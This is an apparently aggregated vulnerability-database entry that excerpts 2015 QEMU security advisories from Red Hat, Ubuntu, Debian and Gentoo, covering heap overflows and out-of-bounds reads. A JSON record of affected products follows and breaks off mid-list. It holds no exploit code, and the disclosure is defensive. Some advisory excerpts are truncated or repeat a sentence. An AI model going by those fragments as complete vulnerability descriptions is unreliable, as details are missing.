A heap buffer overflow flaw was found in the way QEMU's IDE subsystem handled I/O buffer access while processing certain ATAPI commands. (CVE-2015-5154)

An out-of-bounds memory access flaw, leading to memory corruption or possibly an information leak, was found in QEMU's pit_ioport_read() function. (CVE-2015-3214)

Red Hat would like to thank Matt Tait of Google's Project Zero security team for reporting the CVE-2015-3214 issue. The CVE-2015-5154 issue was discovered by Kevin Wolf of Red Hat.

This update also fixes the following bug:

  • Due to an incorrect implementation of portable memory barriers, the QEMU emulator in some cases terminated unexpectedly when a virtual disk was under heavy I/O load. This update fixes the implementation in order to achieve correct synchronization between QEMU's threads. As a result, the described crash no longer occurs. (BZ#1233643)

All qemu-kvm users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, shut down all running virtual machines. Once all virtual machines have shut down, start them again for this update to take effect.

  1. Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

  1. Bugs fixed (https://bugzilla.redhat.com/):

1229640 - CVE-2015-3214 qemu/kvm: i8254: out-of-bounds memory access in pit_ioport_read function 1243563 - CVE-2015-5154 qemu: ide: atapi: heap overflow during I/O buffer memory access

  1. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: qemu-kvm-1.5.3-86.el7_1.5.src.rpm

x86_64: libcacard-1.5.3-86.el7_1.5.i686.rpm libcacard-1.5.3-86.el7_1.5.x86_64.rpm qemu-img-1.5.3-86.el7_1.5.x86_64.rpm qemu-kvm-1.5.3-86.el7_1.5.x86_64.rpm qemu-kvm-common-1.5.3-86.el7_1.5.x86_64.rpm qemu-kvm-debuginfo-1.5.3-86.el7_1.5.i686.rpm qemu-kvm-debuginfo-1.5.3-86.el7_1.5.x86_64.rpm qemu-kvm-tools-1.5.3-86.el7_1.5.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64: libcacard-devel-1.5.3-86.el7_1.5.i686.rpm libcacard-devel-1.5.3-86.el7_1.5.x86_64.rpm libcacard-tools-1.5.3-86.el7_1.5.x86_64.rpm qemu-kvm-debuginfo-1.5.3-86.el7_1.5.i686.rpm qemu-kvm-debuginfo-1.5.3-86.el7_1.5.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Source: qemu-kvm-1.5.3-86.el7_1.5.src.rpm

x86_64: libcacard-1.5.3-86.el7_1.5.i686.rpm libcacard-1.5.3-86.el7_1.5.x86_64.rpm libcacard-devel-1.5.3-86.el7_1.5.i686.rpm libcacard-devel-1.5.3-86.el7_1.5.x86_64.rpm libcacard-tools-1.5.3-86.el7_1.5.x86_64.rpm qemu-img-1.5.3-86.el7_1.5.x86_64.rpm qemu-kvm-1.5.3-86.el7_1.5.x86_64.rpm qemu-kvm-common-1.5.3-86.el7_1.5.x86_64.rpm qemu-kvm-debuginfo-1.5.3-86.el7_1.5.i686.rpm qemu-kvm-debuginfo-1.5.3-86.el7_1.5.x86_64.rpm qemu-kvm-tools-1.5.3-86.el7_1.5.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: qemu-kvm-1.5.3-86.el7_1.5.src.rpm

ppc64: qemu-img-1.5.3-86.el7_1.5.ppc64.rpm qemu-kvm-debuginfo-1.5.3-86.el7_1.5.ppc64.rpm

x86_64: libcacard-1.5.3-86.el7_1.5.i686.rpm libcacard-1.5.3-86.el7_1.5.x86_64.rpm qemu-img-1.5.3-86.el7_1.5.x86_64.rpm qemu-kvm-1.5.3-86.el7_1.5.x86_64.rpm qemu-kvm-common-1.5.3-86.el7_1.5.x86_64.rpm qemu-kvm-debuginfo-1.5.3-86.el7_1.5.i686.rpm qemu-kvm-debuginfo-1.5.3-86.el7_1.5.x86_64.rpm qemu-kvm-tools-1.5.3-86.el7_1.5.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64: libcacard-1.5.3-86.el7_1.5.ppc.rpm libcacard-1.5.3-86.el7_1.5.ppc64.rpm libcacard-devel-1.5.3-86.el7_1.5.ppc.rpm libcacard-devel-1.5.3-86.el7_1.5.ppc64.rpm libcacard-tools-1.5.3-86.el7_1.5.ppc64.rpm qemu-kvm-debuginfo-1.5.3-86.el7_1.5.ppc.rpm qemu-kvm-debuginfo-1.5.3-86.el7_1.5.ppc64.rpm

x86_64: libcacard-devel-1.5.3-86.el7_1.5.i686.rpm libcacard-devel-1.5.3-86.el7_1.5.x86_64.rpm libcacard-tools-1.5.3-86.el7_1.5.x86_64.rpm qemu-kvm-debuginfo-1.5.3-86.el7_1.5.i686.rpm qemu-kvm-debuginfo-1.5.3-86.el7_1.5.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: qemu-kvm-1.5.3-86.el7_1.5.src.rpm

x86_64: libcacard-1.5.3-86.el7_1.5.i686.rpm libcacard-1.5.3-86.el7_1.5.x86_64.rpm qemu-img-1.5.3-86.el7_1.5.x86_64.rpm qemu-kvm-1.5.3-86.el7_1.5.x86_64.rpm qemu-kvm-common-1.5.3-86.el7_1.5.x86_64.rpm qemu-kvm-debuginfo-1.5.3-86.el7_1.5.i686.rpm qemu-kvm-debuginfo-1.5.3-86.el7_1.5.x86_64.rpm qemu-kvm-tools-1.5.3-86.el7_1.5.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64: libcacard-devel-1.5.3-86.el7_1.5.i686.rpm libcacard-devel-1.5.3-86.el7_1.5.x86_64.rpm libcacard-tools-1.5.3-86.el7_1.5.x86_64.rpm qemu-kvm-debuginfo-1.5.3-86.el7_1.5.i686.rpm qemu-kvm-debuginfo-1.5.3-86.el7_1.5.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2015-3214 https://access.redhat.com/security/cve/CVE-2015-5154 https://access.redhat.com/security/updates/classification/#important

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iD8DBQFVtjQAXlSAg2UNWIIRAubOAJ9jPmZf7ZF+FHd+a7JxYxxRPAGx0wCgv5dX hlTFJ96W8Yn4W+ZR2yhsbBU= =i68a -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ============================================================================ Ubuntu Security Notice USN-2692-1 July 28, 2015

qemu vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 15.04
  • Ubuntu 14.04 LTS

Summary:

Several security issues were fixed in QEMU. In the default installation, when QEMU is used with libvirt, attackers would be isolated by the libvirt AppArmor profile. In the default installation, when QEMU is used with libvirt, attackers would be isolated by the libvirt AppArmor profile. (CVE-2015-5154)

Zhu Donghai discovered that QEMU incorrectly handled the SCSI driver. In the default installation, when QEMU is used with libvirt, attackers would be isolated by the libvirt AppArmor profile. This issue only affected Ubuntu 15.04. (CVE-2015-5158)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 15.04: qemu-system 1:2.2+dfsg-5expubuntu9.3 qemu-system-aarch64 1:2.2+dfsg-5expubuntu9.3 qemu-system-arm 1:2.2+dfsg-5expubuntu9.3 qemu-system-mips 1:2.2+dfsg-5expubuntu9.3 qemu-system-misc 1:2.2+dfsg-5expubuntu9.3 qemu-system-ppc 1:2.2+dfsg-5expubuntu9.3 qemu-system-sparc 1:2.2+dfsg-5expubuntu9.3 qemu-system-x86 1:2.2+dfsg-5expubuntu9.3

Ubuntu 14.04 LTS: qemu-system 2.0.0+dfsg-2ubuntu1.15 qemu-system-aarch64 2.0.0+dfsg-2ubuntu1.15 qemu-system-arm 2.0.0+dfsg-2ubuntu1.15 qemu-system-mips 2.0.0+dfsg-2ubuntu1.15 qemu-system-misc 2.0.0+dfsg-2ubuntu1.15 qemu-system-ppc 2.0.0+dfsg-2ubuntu1.15 qemu-system-sparc 2.0.0+dfsg-2ubuntu1.15 qemu-system-x86 2.0.0+dfsg-2ubuntu1.15

After a standard system update you need to restart all QEMU virtual machines to make all the necessary changes.

CVE-2015-5165

Donghai Zhu discovered that the QEMU model of the RTL8139 network
card did not sufficiently validate inputs in the C+ mode offload
emulation, allowing a malicious guest to read uninitialized memory
from the QEMU process's heap.

CVE-2015-5225

Mr Qinghao Tang from QIHU 360 Inc.

For the oldstable distribution (wheezy), these problems have been fixed in version 1.1.2+dfsg-6a+deb7u9. The oldstable distribution is only affected by CVE-2015-5165 and CVE-2015-5745.

For the stable distribution (jessie), these problems have been fixed in version 1:2.1+dfsg-12+deb8u2.

For the unstable distribution (sid), these problems have been fixed in version 1:2.4+dfsg-1a.

We recommend that you upgrade your qemu packages. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201510-02


                                       https://security.gentoo.org/

Severity: Normal Title: QEMU: Arbitrary code execution Date: October 31, 2015 Bugs: #551752, #555680, #556050, #556052 ID: 201510-02


Synopsis

A heap-based buffer overflow in QEMU could result in execution of arbitrary code.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 app-emulation/qemu < 2.3.0-r4 >= 2.3.0-r4

Description

Heap-based buffer overflow has been found in QEMU's PCNET controller.

Workaround

There is no known workaround at this time.

Resolution

All QEMU users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=app-emulation/qemu-2.3.0-r4"

References

[ 1 ] CVE-2015-3209 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3209 [ 2 ] CVE-2015-3214 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3214 [ 3 ] CVE-2015-5154 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5154 [ 4 ] CVE-2015-5158 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5158

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/201510-02

Concerns?

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License

Copyright 2015 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201508-0166",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "eos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": "4.14"
      },
      {
        "model": "enterprise linux for power big endian eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4_ppc64"
      },
      {
        "model": "openstack",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "model": "enterprise linux server from rhui",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "enterprise linux for scientific computing",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.5"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "7.0"
      },
      {
        "model": "virtualization",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "3.0"
      },
      {
        "model": "enterprise linux compute node eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.5"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "model": "enterprise linux compute node eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "enterprise linux compute node eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "enterprise linux server update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "enterprise linux for power big endian eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3_ppc64"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "enterprise linux compute node eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "enterprise linux for power big endian eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.1_ppc64"
      },
      {
        "model": "eos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": "4.12"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.1"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "enterprise linux compute node eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.1"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "enterprise linux compute node eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "eos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": "4.15"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "model": "enterprise linux for power big endian eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2_ppc64"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "enterprise linux server update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "enterprise linux server update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "enterprise linux for power big endian eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6_ppc64"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "enterprise linux server update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "emc px12-400r ivx",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "lenovo",
        "version": "1.0.10.33264"
      },
      {
        "model": "emc px12-450r ivx",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "lenovo",
        "version": "1.0.10.33264"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "enterprise linux compute node eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "qemu",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "qemu",
        "version": "2.3.0"
      },
      {
        "model": "enterprise linux for power big endian",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "enterprise linux server update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "openstack",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "eos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": "4.13"
      },
      {
        "model": "enterprise linux for power big endian eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7_ppc64"
      },
      {
        "model": "enterprise linux for power big endian eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.5_ppc64"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "qemu",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "fabrice bellard",
        "version": "2.3.1"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "linux",
        "version": "2.6.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "15.04"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.04"
      },
      {
        "model": "enterprise virtualization hypervisor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "qemu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "qemu",
        "version": "0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7"
      },
      {
        "model": "powerkvm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "linux",
        "scope": null,
        "trust": 0.3,
        "vendor": "gentoo",
        "version": null
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "7"
      },
      {
        "model": "powerkvm build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.158"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "75273"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-004512"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3214"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201506-371"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "2.6.32",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:qemu:qemu:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "2.3.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:arista:eos:4.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:arista:eos:4.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:arista:eos:4.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:arista:eos:4.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:lenovo:emc_px12-450r_ivx:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "1.0.10.33264",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:lenovo:emc_px12-400r_ivx:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "1.0.10.33264",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_scientific_computing:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:redhat:openstack:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_big_endian_eus:7.1_ppc64:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_compute_node_eus:7.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_big_endian:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:redhat:openstack:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:redhat:virtualization:3.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:7.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_big_endian_eus:7.2_ppc64:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_compute_node_eus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_compute_node_eus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_compute_node_eus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
